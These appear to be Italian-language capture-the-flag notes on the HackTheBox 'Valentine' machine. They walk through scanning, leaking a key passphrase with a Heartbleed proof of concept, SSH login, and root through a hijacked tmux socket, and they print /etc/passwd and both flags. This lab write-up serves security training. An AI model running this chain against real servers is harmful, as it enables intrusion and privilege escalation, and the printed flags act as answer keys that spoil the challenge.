10.10.10.79


sudo nmap -vv -p- -T4 -n -Pn 10.10.10.79 
[sudo] password for kali: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-15 17:51 EDT
Initiating SYN Stealth Scan at 17:51
Scanning 10.10.10.79 [65535 ports]
Discovered open port 443/tcp on 10.10.10.79
Discovered open port 22/tcp on 10.10.10.79
Discovered open port 80/tcp on 10.10.10.79
Completed SYN Stealth Scan at 17:51, 16.11s elapsed (65535 total ports)
Nmap scan report for 10.10.10.79
Host is up, received user-set (0.052s latency).
Scanned at 2022-03-15 17:51:03 EDT for 16s
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 63
80/tcp  open  http    syn-ack ttl 63
443/tcp open  https   syn-ack ttl 63



sudo nmap -sC -sV -p 22,80,443 10.10.10.79   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-15 17:51 EDT
Nmap scan report for 10.10.10.79
Host is up (0.058s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_ssl-date: 2022-03-15T21:52:08+00:00; -1s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.47 seconds




PORT 80:

c'è solo un'immagine (omg.jpg)


sudo gobuster  dir -u http://10.10.10.79/ -w /usr/share/wordlists/dirb/big.txt -t 100 -x .php,.js,.txt,.htm,.html
[sudo] password for kali: 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.79/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,js,txt,htm,html
[+] Timeout:                 10s
===============================================================
2022/03/15 17:53:49 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.html       (Status: 403) [Size: 293]
/.htpasswd            (Status: 403) [Size: 288]
/.htaccess            (Status: 403) [Size: 288]
/.htpasswd.php        (Status: 403) [Size: 292]
/.htaccess.php        (Status: 403) [Size: 292]
/.htpasswd.js         (Status: 403) [Size: 291]
/.htaccess.js         (Status: 403) [Size: 291]
/.htpasswd.txt        (Status: 403) [Size: 292]
/.htaccess.txt        (Status: 403) [Size: 292]
/.htpasswd.htm        (Status: 403) [Size: 292]
/.htaccess.htm        (Status: 403) [Size: 292]
/.htpasswd.html       (Status: 403) [Size: 293]
/cgi-bin/.htm         (Status: 403) [Size: 291]
/cgi-bin/.html        (Status: 403) [Size: 292]
/cgi-bin/             (Status: 403) [Size: 287]
/decode               (Status: 200) [Size: 552]
/decode.php           (Status: 200) [Size: 552]
/dev                  (Status: 301) [Size: 308] [--> http://10.10.10.79/dev/]
/encode.php           (Status: 200) [Size: 554]                              
/encode               (Status: 200) [Size: 554]                              
/index.php            (Status: 200) [Size: 38]                               
/index                (Status: 200) [Size: 38]                               
/server-status        (Status: 403) [Size: 292]     


PORT 443

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />
Instead use the HTTPS scheme to access this URL, please.<br />
<blockquote>Hint: <a href="https://10.10.10.136/"><b>https://10.10.10.136/</b></a></blockquote></p>
<hr>
<address>Apache/2.2.22 (Ubuntu) Server at 10.10.10.136 Port 443</address>
</body></html>


10.10.10.136 ??


andandoci con https invece ottengo la stessa pagina della porta 80: solo un'immagine (omg.jpg)


provo a raggiungere 10.10.10.136 ma non riesco, potrei riuscire a raggiungerlo usando l'hostname ? nel certificato sulla porta 443 c'è valentine.htb, provo a metterlo
in /etc/hosts

niente


sudo gobuster  dir -u https://10.10.10.79/ -w /usr/share/wordlists/dirb/big.txt -t 100 -x .php,.js,.txt,.htm,.html -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.79/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,js,txt,htm,html
[+] Timeout:                 10s
===============================================================
2022/03/15 17:57:12 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 289]
/.htpasswd            (Status: 403) [Size: 289]
/.htaccess.js         (Status: 403) [Size: 292]
/.htpasswd.php        (Status: 403) [Size: 293]
/.htaccess.txt        (Status: 403) [Size: 293]
/.htpasswd.js         (Status: 403) [Size: 292]
/.htaccess.htm        (Status: 403) [Size: 293]
/.htpasswd.txt        (Status: 403) [Size: 293]
/.htpasswd.htm        (Status: 403) [Size: 293]
/.htaccess.html       (Status: 403) [Size: 294]
/.htpasswd.html       (Status: 403) [Size: 294]
/.htaccess.php        (Status: 403) [Size: 293]
/cgi-bin/             (Status: 403) [Size: 288]
/cgi-bin/.htm         (Status: 403) [Size: 292]
/cgi-bin/.html        (Status: 403) [Size: 293]
/decode               (Status: 200) [Size: 552]
/decode.php           (Status: 200) [Size: 552]
/dev                  (Status: 301) [Size: 310] [--> https://10.10.10.79/dev/]
/encode               (Status: 200) [Size: 554]                               
/encode.php           (Status: 200) [Size: 554]                               
/index                (Status: 200) [Size: 38]                                
/index.php            (Status: 200) [Size: 38]                                
/server-status        (Status: 403) [Size: 293]                               
                                                                              
===============================================================
2022/03/15 17:58:32 Finished
===============================================================









c'è praticamente lo stesso sito sia su 80 che su 443




https://10.10.10.79/dev/notes.txt

To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

in realtà encode.php e decode.php sono sepmlici decodere / encoder base 64 niente di troppo interessante

c'è anche il file hype_key


hype_key sembra essere una chiave privata, la formatto (è in formato hex)


e ottengo un chiave privata rsa che potrei provare ad usare per fare login con ssh sulla macchina  (magari utente hype (?))

chmod 600 hype_key_formatted

mi chiede passphrase che non ho e non riesco a crackarla con john/hashcat

provo a cercare delle vulnerabilità





nmap --script vuln -p 443 10.10.10.79
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-15 18:20 EDT
Nmap scan report for valentine.htb (10.10.10.79)
Host is up (0.060s latency).

PORT    STATE SERVICE
443/tcp open  https
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|_      https://www.securityfocus.com/bid/70574
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140407.txt 
|       http://cvedetails.com/cve/2014-0160/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.openssl.org/news/secadv_20140605.txt
|_      http://www.cvedetails.com/cve/2014-0224



ssl-heartbleed: 
|   VULNERABLE:


è vulnerabile a HEARTBLEED


uso :


https://github.com/sensepost/heartbleed-poc





python2 heartbleed-poc.py 10.10.10.79 -p 443 -n 10 -f heartbleed_out



cercando nel file heartbleed_out trovo:

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

sembra base64 

lo decodifico:

heartbleedbelievethehype


potrebbe essere la passphrase per la private key che ho trovato




ssh -i hype_key_formatted hype@10.10.10.79
Enter passphrase for key 'hype_key_formatted': 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$ 


riesco ad accedere e a prendere user.txt


hype@Valentine:~/Desktop$ cat user.txt
e6710a5464769fd5fcd216e076961750

hype@Valentine:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:105:114::/nonexistent:/bin/false
avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
saned:x:114:123::/home/saned:/bin/false
hype:x:1000:1000:Hemorrhage,,,:/home/hype:/bin/bash
sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin


sotto / c'è una directory diversa dal solito


hype@Valentine:/.devs$ pwd
/.devs
hype@Valentine:/.devs$ ls -lart
total 8
drwxr-xr-x 26 root root 4096 Feb  6  2018 ..
srw-rw----  1 root hype    0 Mar 15 14:50 dev_sess
drwxr-xr-x  2 root hype 4096 Mar 15 14:50 .
hype@Valentine:/.devs$ 


hype@Valentine:/.devs$ file dev_sess
dev_sess: socket


dev_sess è di tipo socket


seguo questo articolo:

https://steflan-security.com/linux-privilege-escalation-exploiting-shell-sessions/


il socket potrebbe essere usato da root per una shell session, vedo se ce ne sono con il comando:


hype@Valentine:/.devs$ ps aux | grep 'screen\|tmux\|byobu\|abduco\|dvtm\|mtm'
root       1012  0.0  0.1  26416  1672 ?        Ss   14:50   0:01 /usr/bin/tmux -S /.devs/dev_sess
hype       3126  0.0  0.0  13576   928 pts/0    S+   15:41   0:00 grep --color=auto screen\|tmux\|byobu\|abduco\|dvtm\|mtm


ed effettivamente c'è una session tmux di root che usa questo socket, posso sfruttarla con:

tmux -S path_to_socket

tmux -S /.devs/dev_sess


root@Valentine:/.devs# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/.devs# cat /root/root.txt
f1bb6d759df1f272914ebbc9ed7765b2
root@Valentine:/.devs# 


